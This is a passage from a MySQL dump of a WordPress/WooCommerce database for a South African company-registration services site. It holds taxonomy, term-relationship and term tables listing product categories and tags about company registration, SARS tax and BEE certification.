,178,0),(32018,178,0),(32019,178,0),(32020,178,0),(32021,178,0),(32022,178,0),(32023,178,0),(32024,178,0),(32025,178,0),(32026,178,0),(32027,178,0),(32028,178,0),(32029,178,0),(32030,178,0),(32031,178,0),(32032,178,0),(32033,178,0),(32035,179,0),(32036,171,0),(32037,179,0),(32038,171,0),(32039,171,0),(32040,178,0),(32041,178,0),(32042,178,0),(32043,178,0),(32044,178,0),(32045,178,0),(32047,171,0),(32048,179,0),(32049,171,0),(32050,179,0),(32051,171,0),(32052,179,0),(32053,171,0),(32054,179,0),(32055,171,0),(32056,179,0),(32057,171,0),(32058,179,0),(32059,171,0),(32060,179,0),(32061,171,0),(32062,179,0),(32063,171,0),(32064,179,0),(32065,171,0),(32066,179,0),(32067,171,0),(32068,179,0),(32069,171,0),(32070,179,0),(32072,179,0),(32073,171,0),(32074,179,0),(32075,171,0),(32076,178,0),(32077,178,0),(32078,178,0),(32079,178,0),(32080,178,0),(32081,178,0),(32082,178,0),(32083,178,0),(32084,178,0),(32085,178,0),(32086,178,0),(32087,178,0),(32088,178,0),(32089,178,0),(32090,178,0),(32091,178,0),(32092,178,0),(32093,178,0),(32094,178,0),(32095,178,0),(32096,178,0),(32097,178,0),(32098,178,0),(32099,178,0),(32100,178,0),(32101,178,0),(32102,171,0),(32104,179,0),(32105,171,0),(32106,171,0),(32107,171,0),(32109,179,0),(32110,171,0),(32111,171,0),(32112,171,0),(32113,178,0),(32114,178,0),(32116,179,0),(32117,171,0),(32118,171,0),(32120,179,0),(32121,171,0),(32122,171,0),(32123,178,0),(32124,178,0),(32125,178,0),(32126,178,0),(32127,171,0),(32129,179,0),(32130,171,0),(32131,171,0),(32132,179,0),(32133,171,0),(32134,178,0),(32135,178,0),(32136,171,0),(32138,179,0),(32139,171,0),(32140,171,0),(32141,171,0),(32143,179,0),(32144,171,0),(32145,171,0),(32146,179,0),(32147,171,0),(32148,179,0),(32149,171,0),(32150,171,0),(32151,178,0),(32152,178,0),(32153,178,0),(32154,178,0),(32155,178,0),(32156,178,0),(32157,178,0),(32158,178,0),(32159,178,0),(32160,178,0),(32161,178,0),(32162,178,0),(32163,178,0),(32164,178,0),(32165,178,0),(32166,178,0),(32167,178,0),(32168,178,0),(32169,178,0),(32170,178,0),(32171,178,0),(32172,178,0),(32173,178,0),(32174,178,0),(32175,178,0),(32176,178,0),(32177,178,0),(32178,178,0),(32179,178,0),(32180,178,0),(32181,178,0),(32182,178,0),(32183,178,0),(32184,178,0),(32185,178,0),(32186,178,0),(32187,178,0),(32188,178,0),(32189,178,0),(32190,178,0),(32191,178,0),(32192,178,0),(32193,178,0),(32194,178,0),(32195,178,0),(32196,178,0),(32197,178,0),(32198,178,0),(32199,178,0),(32200,178,0),(32201,178,0),(32202,178,0),(32203,178,0),(32204,178,0),(32205,178,0),(32206,178,0),(32207,178,0),(32208,178,0),(32209,178,0),(32210,178,0),(32211,178,0),(32212,178,0),(32213,178,0),(32214,178,0),(32215,178,0),(32216,178,0),(32217,178,0),(32218,178,0),(32219,178,0),(32220,178,0),(32221,178,0),(32222,178,0),(32223,178,0),(32224,178,0),(32225,178,0),(32226,178,0),(32227,178,0),(32228,178,0),(32229,178,0),(32230,178,0),(32231,178,0),(32232,178,0),(32233,178,0),(32234,178,0),(32235,178,0),(32236,178,0),(32237,178,0),(32238,178,0),(32239,178,0),(32240,178,0),(32241,178,0),(32242,178,0),(32243,178,0),(32244,178,0),(32245,178,0),(32246,178,0),(32247,171,0),(32249,179,0),(32250,171,0),(32251,171,0),(32252,179,0),(32253,171,0),(32254,179,0),(32255,171,0),(32256,171,0),(32257,171,0),(32258,179,0),(32259,178,0),(32260,178,0),(32261,171,0),(32263,179,0),(32264,171,0),(32265,178,0),(32266,178,0),(32267,171,0),(32269,179,0),(32270,171,0),(32271,178,0),(32272,178,0),(32273,171,0),(32275,179,0),(32276,171,0),(32277,178,0),(32278,178,0),(32279,178,0),(32280,178,0),(32281,178,0),(32282,178,0),(32283,178,0),(32284,178,0),(32286,178,0),(32287,178,0),(32288,178,0),(32289,178,0),(32290,178,0),(32291,178,0),(32292,178,0),(32293,178,0),(32294,178,0),(32295,178,0),(32296,178,0),(32297,178,0),(32298,178,0),(32299,178,0),(32300,178,0),(32301,178,0),(32302,178,0),(32303,178,0),(32304,178,0),(32305,178,0),(32306,178,0),(32307,178,0),(32308,178,0),(32309,178,0),(32310,171,0),(32311,171,0),(32312,178,0),(32313,178,0),(32314,178,0),(32315,178,0),(32316,178,0),(32317,178,0),(32318,178,0),(32319,178,0),(32320,178,0),(32321,178,0),(32322,178,0),(32323,178,0),(32324,178,0),(32325,178,0),(32326,178,0),(32327,178,0),(32328,178,0),(32329,178,0),(32330,178,0),(32331,178,0),(32332,178,0),(32333,178,0),(32334,178,0),(32335,178,0),(32336,178,0),(32337,178,0),(32338,178,0),(32339,178,0),(32340,178,0),(32341,178,0),(32342,178,0),(32343,178,0),(32344,178,0),(32345,178,0),(32347,171,0),(32349,179,0),(32350,171,0),(32351,171,0),(32352,171,0),(32353,178,0),(32354,178,0),(32355,178,0),(32356,178,0),(32357,178,0),(32358,178,0),(32359,178,0),(32360,178,0),(32361,178,0),(32362,178,0),(32363,178,0),(32364,178,0),(32365,178,0),(32366,178,0),(32367,178,0),(32368,178,0),(32369,178,0),(32370,178,0),(32371,178,0),(32372,178,0),(32373,178,0),(32374,178,0),(32375,178,0),(32376,178,0),(32377,178,0),(32378,178,0),(32379,178,0),(32380,178,0),(32381,178,0),(32382,178,0),(32384,178,0),(32385,178,0),(32407,178,0),(32408,178,0),(32409,178,0),(32410,178,0),(32411,178,0),(32412,178,0),(32346,39,0),(32415,178,0),(32416,178,0),(32431,171,0),(32433,179,0),(32434,171,0),(32435,179,0),(32436,171,0),(32437,171,0),(32440,178,0),(32441,178,0),(32466,178,0),(32467,178,0),(32468,178,0),(32469,178,0),(32470,178,0),(32471,178,0),(32472,178,0),(32473,178,0),(32474,178,0),(32475,178,0),(32476,178,0),(32477,178,0),(32478,178,0),(32479,178,0),(32480,178,0),(32481,178,0),(32482,178,0),(32483,178,0),(32484,178,0),(32485,178,0),(32486,178,0),(32487,178,0),(32488,178,0),(32489,178,0),(32490,178,0),(32491,178,0),(32492,178,0),(32493,178,0),(32494,178,0),(32495,178,0),(32496,178,0),(32497,178,0),(32498,178,0),(32499,178,0),(32500,178,0),(32501,178,0),(32502,178,0),(32503,178,0),(32504,178,0),(32505,178,0),(32506,178,0),(32507,178,0),(32508,178,0),(32509,178,0),(32510,178,0),(32511,178,0),(32512,178,0),(32513,178,0),(32514,178,0),(32515,178,0),(32516,178,0),(32517,178,0),(32518,178,0),(32519,178,0),(32520,178,0),(32521,178,0),(32522,178,0),(32523,178,0),(32524,178,0),(32525,178,0),(32526,178,0),(32527,178,0),(32528,178,0),(32529,178,0),(32530,178,0),(32531,178,0),(32532,178,0),(32533,178,0),(32534,178,0),(32535,178,0),(32536,178,0),(32537,178,0),(32538,178,0),(32539,178,0),(32540,178,0),(32541,178,0),(32542,178,0),(32543,178,0),(32544,178,0),(32545,178,0),(32546,178,0),(32547,178,0),(32548,178,0),(32549,178,0),(32550,178,0),(32551,178,0),(32552,178,0),(32553,178,0),(32554,178,0),(32555,178,0),(32556,178,0),(32557,178,0),(32558,178,0),(32559,178,0),(32560,178,0),(32561,178,0),(32562,178,0),(32563,178,0),(32564,178,0),(32565,178,0),(32566,178,0),(32567,178,0),(32568,178,0),(32569,178,0),(32570,178,0),(32571,178,0),(32572,178,0),(32573,178,0),(32574,178,0),(32575,178,0),(32576,178,0),(32577,178,0),(32578,178,0),(32579,178,0),(32580,178,0),(32581,178,0),(32582,178,0),(32583,178,0),(32584,178,0),(32585,178,0),(32586,178,0),(32587,178,0),(32588,178,0),(32589,178,0),(32590,178,0),(32591,178,0),(32592,178,0),(32593,178,0),(32594,178,0),(32595,178,0),(32596,178,0),(32597,178,0),(32598,178,0),(32599,178,0),(32600,178,0),(32601,178,0),(32602,178,0),(32603,178,0),(32604,178,0),(32605,178,0),(32606,178,0),(32607,178,0),(32608,178,0),(32609,178,0),(32610,178,0),(32611,178,0),(32612,178,0),(32613,178,0),(32614,178,0),(32615,178,0),(32616,178,0),(32617,178,0),(32618,178,0),(32619,178,0),(32620,178,0),(32621,178,0),(32622,178,0),(32623,178,0),(32624,178,0),(32625,178,0),(32626,178,0),(32627,178,0),(32628,178,0),(32629,178,0),(32630,178,0),(32631,178,0),(32632,178,0),(32633,178,0),(32634,178,0),(32635,178,0),(32636,178,0),(32637,178,0),(32638,178,0),(32639,178,0),(32640,178,0),(32641,178,0),(32642,178,0),(32643,178,0),(32644,178,0),(32645,178,0),(32646,178,0),(32647,178,0),(32648,178,0),(32649,178,0),(32650,178,0),(32651,178,0),(32652,178,0),(32653,178,0),(32654,178,0),(32655,178,0),(32656,178,0),(32657,178,0),(32658,178,0),(32659,178,0),(32660,178,0),(32661,178,0),(32662,178,0),(32663,178,0),(32675,178,0),(32676,178,0),(32677,178,0),(32678,178,0),(32679,178,0),(32680,178,0),(32681,178,0),(32682,178,0),(32683,178,0),(32684,178,0),(32685,178,0),(32686,178,0),(32687,178,0),(32688,178,0),(32689,178,0),(32690,178,0),(32691,178,0),(32692,178,0),(32693,178,0),(32694,178,0),(32695,178,0),(32696,178,0),(32697,178,0),(32698,178,0),(32699,178,0),(32700,178,0),(32701,178,0),(32702,178,0),(32703,178,0),(32704,178,0),(32705,178,0),(32706,178,0),(32707,178,0),(32708,178,0),(32709,178,0),(32710,178,0),(32711,178,0),(32712,178,0),(32717,178,0),(32718,178,0),(32720,178,0),(32721,178,0),(32730,178,0),(32731,178,0),(32732,178,0),(32733,178,0),(32736,178,0),(32737,178,0),(32738,178,0),(32739,178,0),(32740,178,0),(32741,178,0),(32742,178,0),(32743,178,0),(32744,178,0),(32745,178,0),(32746,178,0),(32747,178,0),(32748,178,0),(32749,178,0),(32750,178,0),(32751,178,0),(32752,178,0),(32753,178,0),(32754,178,0),(32755,178,0),(32756,178,0),(32757,178,0),(32758,178,0),(32759,178,0),(32760,178,0),(32761,178,0),(32762,178,0),(32763,178,0),(32764,178,0),(32765,178,0),(32772,178,0),(32773,178,0),(32774,178,0),(32775,178,0),(32787,178,0),(32788,178,0),(32798,178,0),(32799,178,0),(32800,178,0),(32801,178,0),(32815,178,0),(32816,178,0),(32822,148,0),(32822,150,0),(32822,149,0),(32830,178,0),(32831,178,0),(32832,178,0),(32833,178,0),(32834,178,0),(32835,178,0),(32836,178,0),(32837,178,0),(32838,178,0),(32839,178,0),(32840,178,0),(32841,178,0),(32842,178,0),(32843,178,0),(32844,178,0),(32845,178,0),(32846,178,0),(32847,178,0),(32848,178,0),(32849,178,0),(32850,178,0),(32851,178,0),(32852,178,0),(32853,178,0),(32854,178,0),(32855,178,0),(32856,178,0),(32857,178,0),(32859,178,0),(32860,178,0),(32867,178,0),(32868,178,0),(32869,178,0),(32870,178,0),(32871,178,0),(32872,178,0),(32873,178,0),(32874,178,0),(32875,178,0),(32876,178,0),(32877,178,0),(32878,178,0),(32879,178,0),(32880,178,0),(32881,178,0),(32882,178,0),(32883,178,0),(32884,178,0),(32885,178,0),(32886,178,0),(32887,178,0),(32888,178,0),(32889,178,0),(32890,178,0),(32891,178,0),(32892,178,0),(32893,178,0),(32894,178,0),(32895,178,0),(32896,178,0),(32897,178,0),(32898,178,0),(32899,178,0),(32900,178,0),(32901,178,0),(32902,178,0),(32903,178,0),(32904,178,0),(32905,178,0),(32906,178,0),(32907,178,0),(32908,178,0),(32909,178,0),(32910,178,0),(32911,178,0),(32912,178,0),(32913,178,0),(32914,178,0),(32915,178,0),(32916,178,0),(32917,178,0),(32918,178,0),(32919,178,0),(32920,178,0),(32921,178,0),(32922,178,0),(32923,178,0),(32924,178,0),(32925,178,0),(32926,178,0),(32927,178,0),(32928,178,0),(32929,178,0),(32930,178,0),(32931,178,0),(32932,178,0),(32933,178,0),(32934,178,0),(32935,178,0),(32936,178,0),(32937,178,0),(32938,178,0),(32939,178,0),(32940,178,0),(32941,178,0),(32942,178,0),(33131,195,0),(33132,183,0),(33132,195,0),(33135,182,0),(33135,196,0),(33136,183,0),(33136,196,0),(33145,178,0),(33146,178,0),(33147,178,0),(33148,178,0),(33159,178,0),(33160,178,0),(33224,171,0),(33226,179,0),(33227,171,0),(33228,171,0),(33232,171,0),(33233,179,0),(33234,171,0),(33235,171,0),(33237,179,0),(33238,171,0),(33239,171,0),(33240,178,0),(33241,178,0),(33334,92,0),(33334,3,0);
/*!40000 ALTER TABLE `wpxb_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_term_taxonomy`
--

DROP TABLE IF EXISTS `wpxb_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=199 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_term_taxonomy`
--

LOCK TABLES `wpxb_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpxb_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpxb_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'link_category','',0,7),(3,3,'product_type','',0,26),(4,4,'product_type','',0,0),(5,5,'product_type','',0,0),(6,6,'product_type','',0,0),(7,7,'product_cat','<strong>Different types of companies to register</strong>\r\nUnsure which type to register <a href=\"https://companyregistration.online/what-type-of-company-should-i-register/\">click here</a>\r\n',0,4),(8,8,'product_cat','Contains all tax registrations required to become SARS compliant. ',0,6),(9,9,'product_cat','Includes all you require to comply with the Companies Act, whilst running your business.',0,8),(10,10,'product_tag','',0,5),(11,11,'product_tag','',0,2),(12,12,'product_tag','',0,1),(13,13,'nav_menu','',0,6),(14,14,'nav_menu','',0,7),(15,15,'nav_menu','',0,3),(16,16,'product_cat','All your BEE requirements this includes affidavits, certification and verification.',0,1),(17,17,'product_cat','Great source for business tools or resources ',0,3),(18,18,'product_cat','Packaged together to combine the most popular items for greater value.',0,4),(19,19,'product_shipping_class','Rate for different region',0,0),(20,20,'product_tag','',0,0),(21,21,'product_tag','',0,0),(22,22,'product_tag','',0,0),(23,23,'product_tag','',0,0),(24,24,'product_tag','',0,0),(25,25,'product_tag','',0,0),(26,26,'product_tag','',0,0),(27,27,'product_tag','',0,0),(28,28,'product_tag','',0,0),(29,29,'product_tag','',0,0),(30,30,'product_tag','',0,0),(31,31,'product_tag','',0,0),(32,32,'product_tag','',0,0),(33,33,'product_tag','',0,0),(34,34,'product_tag','',0,0),(35,35,'product_tag','',0,0),(36,36,'product_tag','',0,0),(37,37,'product_tag','',0,0),(38,38,'product_tag','',0,0),(39,39,'category','A repository of answers to your registration questions. ',0,22),(40,40,'post_tag','',0,1),(41,41,'post_tag','',0,1),(42,42,'post_tag','',0,1),(43,43,'post_tag','',0,1),(44,44,'product_tag','',0,1),(45,45,'product_tag','',0,1),(46,46,'product_tag','',0,1),(47,47,'product_tag','',0,1),(48,48,'product_tag','',0,1),(49,49,'product_tag','',0,1),(50,50,'product_tag','',0,1),(51,51,'product_tag','',0,0),(52,52,'product_tag','',0,0),(53,53,'product_tag','',0,0),(54,54,'product_tag','',0,1),(55,55,'product_tag','',0,1),(56,56,'product_tag','',0,1),(57,57,'product_tag','',0,1),(58,58,'product_tag','',0,1),(59,59,'product_tag','',0,1),(60,60,'product_tag','',0,4),(61,61,'product_tag','',0,1),(62,62,'product_tag','',0,1),(63,63,'product_tag','',0,1),(64,64,'product_tag','',0,2),(65,65,'product_tag','',0,1),(66,66,'product_tag','',0,1),(67,67,'product_tag','',0,1),(68,68,'product_tag','',0,2),(69,69,'product_tag','',0,1),(70,70,'product_tag','',0,1),(71,71,'product_tag','',0,1),(72,72,'product_tag','',0,1),(73,73,'product_tag','',0,2),(74,74,'product_tag','',0,2),(75,75,'product_tag','',0,2),(76,76,'product_tag','',0,3),(77,77,'product_tag','',0,1),(78,78,'product_tag','',0,1),(79,79,'product_tag','',0,1),(80,80,'product_tag','',0,1),(81,81,'product_tag','',0,5),(82,82,'product_tag','',0,1),(83,83,'product_tag','',0,1),(84,84,'product_tag','',0,1),(85,85,'product_tag','',0,1),(86,86,'product_tag','',0,1),(87,87,'product_tag','',0,1),(88,88,'product_tag','',0,1),(89,89,'product_tag','',0,0),(90,90,'product_tag','',0,0),(91,91,'product_tag','',0,0),(92,92,'product_tag','',0,3),(93,93,'product_tag','',0,0),(94,94,'product_tag','',0,1),(95,95,'product_tag','',0,1),(96,96,'product_tag','',0,1),(97,97,'product_tag','',0,1),(98,98,'product_tag','',0,1),(99,99,'product_tag','',0,1),(100,100,'product_tag','',0,1),(101,101,'product_tag','',0,1),(102,102,'product_tag','',0,1),(103,103,'product_tag','',0,1),(104,104,'post_tag','',0,1),(105,105,'post_tag','',0,1),(106,106,'post_tag','',0,1),(107,107,'post_tag','',0,1),(108,108,'product_tag','',0,1),(109,109,'product_tag','',0,1),(110,110,'product_tag','',0,1),(111,111,'category','Answers to your questions regarding company registrations',39,1),(112,112,'category','Answers to your questions regarding tax registrations',39,0),(113,113,'category','Answers to your questions regarding maintaining your company',39,4),(114,114,'category','Answers to your questions regarding BEE certification and verification',39,0),(115,115,'category','Answers to your questions regarding business in general',39,0),(116,116,'post_tag','',0,1),(117,117,'post_tag','',0,1),(118,118,'post_tag','',0,6),(119,119,'post_tag','',0,1),(120,120,'post_tag','',0,1),(121,121,'post_tag','',0,0),(122,122,'post_tag','',0,0),(123,123,'post_tag','',0,1),(124,124,'post_tag','',0,2),(125,125,'post_tag','',0,1),(126,126,'post_tag','',0,1),(127,127,'post_tag','',0,1),(128,128,'post_tag','',0,1),(129,129,'post_tag','',0,1),(130,130,'post_tag','',0,1),(131,131,'post_tag','',0,1),(132,132,'post_tag','',0,1),(133,133,'post_tag','',0,1),(134,134,'post_tag','',0,1),(135,135,'product_tag','',0,1),(136,136,'product_tag','',0,1),(137,137,'product_tag','',0,1),(138,138,'product_tag','',0,0),(139,139,'product_tag','',0,1),(140,140,'product_tag','',0,1),(141,141,'product_tag','',0,1),(142,142,'product_tag','',0,1),(143,143,'product_tag','',0,1),(144,144,'product_tag','',0,1),(145,145,'product_tag','',0,1),(146,146,'category','',39,0),(147,147,'layout_type','',0,24),(148,148,'scope','',0,60),(149,149,'module_width','',0,60),(150,150,'layout_type','',0,28),(151,151,'product_visibility','',0,0),(152,152,'product_visibility','',0,0),(153,153,'product_visibility','',0,4),(154,154,'product_visibility','',0,0),(155,155,'product_visibility','',0,0),(156,156,'product_visibility','',0,0),(157,157,'product_visibility','',0,0),(158,158,'product_visibility','',0,0),(159,159,'product_visibility','',0,0),(161,161,'product_tag','',0,4),(162,162,'product_tag','',0,4),(163,163,'product_tag','',0,4),(164,164,'product_tag','',0,3),(165,165,'product_tag','',0,1),(166,166,'product_tag','',0,2),(167,167,'product_tag','',0,1),(169,169,'layout_type','',0,7),(170,170,'product_cat','',0,0),(171,171,'action-group','',0,73),(172,172,'product_cat','',0,0),(173,173,'product_tag','',0,2),(174,174,'product_tag','',0,2),(175,175,'product_tag','',0,0),(176,176,'action-group','',0,3),(177,177,'action-group','',0,0),(178,178,'action-group','',0,1148),(179,179,'action-group','',0,40),(180,180,'product_tag','',0,2),(181,181,'cartflows_step_type','',0,0),(182,182,'cartflows_step_type','',0,3),(183,183,'cartflows_step_type','',0,3),(184,184,'cartflows_step_type','',0,0),(185,185,'cartflows_step_type','',0,0),(186,186,'cartflows_step_flow','',0,0),(187,187,'product_tag','',0,1),(188,188,'nav_menu','',0,38),(189,189,'cartflows_step_flow','',0,2),(190,190,'product_tag','',0,0),(191,191,'product_tag','',0,0),(192,192,'layout_category','',0,1),(193,193,'product_tag','',0,0),(194,194,'layout_type','',0,1),(195,195,'cartflows_step_flow','',0,2),(196,196,'cartflows_step_flow','',0,2),(197,197,'product_tag','',0,1),(198,198,'product_tag','',0,1);
/*!40000 ALTER TABLE `wpxb_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_termmeta`
--

DROP TABLE IF EXISTS `wpxb_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=147 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_termmeta`
--

LOCK TABLES `wpxb_termmeta` WRITE;
/*!40000 ALTER TABLE `wpxb_termmeta` DISABLE KEYS */;
INSERT INTO `wpxb_termmeta` VALUES (1,7,'order','0'),(2,7,'display_type',''),(3,7,'thumbnail_id','9'),(4,8,'order','0'),(5,8,'display_type',''),(6,8,'thumbnail_id','10'),(7,9,'order','0'),(8,9,'display_type',''),(9,9,'thumbnail_id','11'),(10,7,'product_count_product_cat','4'),(11,10,'product_count_product_tag','5'),(12,11,'product_count_product_tag','2'),(13,12,'product_count_product_tag','1'),(14,16,'order','0'),(15,16,'display_type',''),(16,16,'thumbnail_id','49'),(17,17,'order','0'),(18,17,'display_type',''),(19,17,'thumbnail_id','50'),(20,18,'order','0'),(21,18,'display_type',''),(22,18,'thumbnail_id','51'),(23,20,'product_count_product_tag','0'),(24,21,'product_count_product_tag','0'),(25,22,'product_count_product_tag','0'),(26,23,'product_count_product_tag','0'),(27,9,'product_count_product_cat','8'),(28,24,'product_count_product_tag','0'),(29,25,'product_count_product_tag','0'),(30,26,'product_count_product_tag','0'),(31,27,'product_count_product_tag','0'),(32,28,'product_count_product_tag','0'),(33,29,'product_count_product_tag','0'),(34,30,'product_count_product_tag','0'),(35,31,'product_count_product_tag','0'),(36,8,'product_count_product_cat','6'),(37,32,'product_count_product_tag','0'),(38,33,'product_count_product_tag','0'),(39,34,'product_count_product_tag','0'),(40,35,'product_count_product_tag','0'),(41,36,'product_count_product_tag','0'),(42,16,'product_count_product_cat','1'),(43,37,'product_count_product_tag','0'),(44,17,'product_count_product_cat','3'),(45,38,'product_count_product_tag','0'),(46,44,'product_count_product_tag','1'),(47,45,'product_count_product_tag','1'),(48,46,'product_count_product_tag','1'),(49,47,'product_count_product_tag','1'),(50,48,'product_count_product_tag','1'),(51,49,'product_count_product_tag','1'),(52,50,'product_count_product_tag','1'),(53,51,'product_count_product_tag','0'),(54,52,'product_count_product_tag','0'),(55,53,'product_count_product_tag','0'),(56,54,'product_count_product_tag','1'),(57,55,'product_count_product_tag','1'),(58,56,'product_count_product_tag','1'),(59,57,'product_count_product_tag','1'),(60,58,'product_count_product_tag','1'),(61,59,'product_count_product_tag','1'),(62,60,'product_count_product_tag','4'),(63,61,'product_count_product_tag','1'),(64,62,'product_count_product_tag','1'),(65,63,'product_count_product_tag','1'),(66,64,'product_count_product_tag','2'),(67,65,'product_count_product_tag','1'),(68,66,'product_count_product_tag','1'),(69,67,'product_count_product_tag','1'),(70,68,'product_count_product_tag','2'),(71,69,'product_count_product_tag','1'),(72,70,'product_count_product_tag','1'),(73,71,'product_count_product_tag','1'),(74,72,'product_count_product_tag','1'),(75,73,'product_count_product_tag','2'),(76,74,'product_count_product_tag','2'),(77,75,'product_count_product_tag','2'),(78,76,'product_count_product_tag','3'),(79,77,'product_count_product_tag','1'),(80,78,'product_count_product_tag','1'),(81,79,'product_count_product_tag','1'),(82,80,'product_count_product_tag','1'),(83,81,'product_count_product_tag','5'),(84,82,'product_count_product_tag','1'),(85,83,'product_count_product_tag','1'),(86,84,'product_count_product_tag','1'),(87,85,'product_count_product_tag','1'),(88,86,'product_count_product_tag','1'),(89,87,'product_count_product_tag','1'),(90,88,'product_count_product_tag','1'),(91,89,'product_count_product_tag','0'),(92,90,'product_count_product_tag','0'),(93,91,'product_count_product_tag','0'),(94,92,'product_count_product_tag','3'),(95,93,'product_count_product_tag','0'),(96,94,'product_count_product_tag','1'),(97,95,'product_count_product_tag','1'),(98,96,'product_count_product_tag','1'),(99,97,'product_count_product_tag','1'),(100,98,'product_count_product_tag','1'),(101,99,'product_count_product_tag','1'),(102,100,'product_count_product_tag','1'),(103,101,'product_count_product_tag','1'),(104,102,'product_count_product_tag','1'),(105,103,'product_count_product_tag','1'),(106,108,'product_count_product_tag','1'),(107,109,'product_count_product_tag','1'),(108,110,'product_count_product_tag','1'),(109,135,'product_count_product_tag','1'),(110,136,'product_count_product_tag','1'),(111,137,'product_count_product_tag','1'),(112,138,'product_count_product_tag','0'),(113,139,'product_count_product_tag','1'),(114,140,'product_count_product_tag','1'),(115,141,'product_count_product_tag','1'),(116,142,'product_count_product_tag','1'),(117,143,'product_count_product_tag','1'),(118,144,'product_count_product_tag','1'),(119,145,'product_count_product_tag','1'),(124,161,'product_count_product_tag','4'),(125,162,'product_count_product_tag','4'),(126,163,'product_count_product_tag','4'),(127,164,'product_count_product_tag','3'),(128,165,'product_count_product_tag','1'),(129,166,'product_count_product_tag','2'),(130,167,'product_count_product_tag','1'),(134,18,'product_count_product_cat','4'),(135,170,'product_count_product_cat','0'),(136,172,'order','0'),(137,172,'product_count_product_cat','0'),(138,173,'product_count_product_tag','2'),(139,174,'product_count_product_tag','2'),(140,175,'product_count_product_tag','0'),(141,180,'product_count_product_tag','2'),(142,187,'product_count_product_tag','1'),(143,190,'product_count_product_tag','0'),(144,191,'product_count_product_tag','0'),(145,197,'product_count_product_tag','1'),(146,198,'product_count_product_tag','1');
/*!40000 ALTER TABLE `wpxb_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_terms`
--

DROP TABLE IF EXISTS `wpxb_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=199 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_terms`
--

LOCK TABLES `wpxb_terms` WRITE;
/*!40000 ALTER TABLE `wpxb_terms` DISABLE KEYS */;
INSERT INTO `wpxb_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Blogroll','blogroll',0),(3,'simple','simple',0),(4,'grouped','grouped',0),(5,'variable','variable',0),(6,'external','external',0),(7,'Company Registration','company-registration',0),(8,'Tax Registration','tax-registration',0),(9,'Maintaning Your Company','maintaning-our-company',0),(10,'company registration','company-registration',0),(11,'private company','private-company',0),(12,'new company','new-company',0),(13,'Main','main',0),(14,'Product Category','product-category',0),(15,'Legal','legal',0),(16,'BEE Requirements','bee-requirements',0),(17,'Business Tools','business-tools',0),(18,'Combo Deals','combo-deals',0),(19,'Regional','regional',0),(20,'#common# #medium business# #new registrations# #private company# #recommended# #small business# #sme# # typical#','common-medium-business-new-registrations-private-company-recommended-small-business-sme-typical',0),(21,'#customised# # customised MOI# #MOI# #private company#','customised-customised-moi-moi-private-company',0),(22,'#personal# #liability# #company#','personal-liability-company',0),(23,'#personal# #liability# #company# #registration#','personal-liability-company-registration',0),(24,'#change# #director# #amendments#','change-director-amendments',0),(25,'#change# #mebers# #amendments#','change-mebers-amendments',0),(26,'#address# #changes# #company#','address-changes-company',0),(27,'#change# #address# # close corporation#','change-address-close-corporation',0),(28,'#annual# #returns# #company# #close corporation#','annual-returns-company-close-corporation',0),(29,'#auditor# #appointment# #resignation# #company# #secretary#','auditor-appointment-resignation-company-secretary',0),(30,'#restoration# #company# #close corporations#','restoration-company-close-corporations',0),(31,'#company register# #reports# #secure# #share certificates# #shareholders#','company-register-reports-secure-share-certificates-shareholders',0),(32,'#income tax registration# income tax number# SARS#','income-tax-registration-income-tax-number-sars',0),(33,'#PAYE# salary tax# salary taxes# SARS # SDL# UIF#','paye-salary-tax-salary-taxes-sars-sdl-uif',0),(34,'#clearance# sars clearance# tax certificate# #tax clearance#','clearance-sars-clearance-tax-certificate-tax-clearance',0),(35,'#SARS# #tax# #taxes# #value added tax# #vat# #vat registration#','sars-tax-taxes-value-added-tax-vat-vat-registration',0),(36,'#export# #import# #tax#','export-import-tax',0),(37,'#BEE# #BEE Certificate# #CIPC# 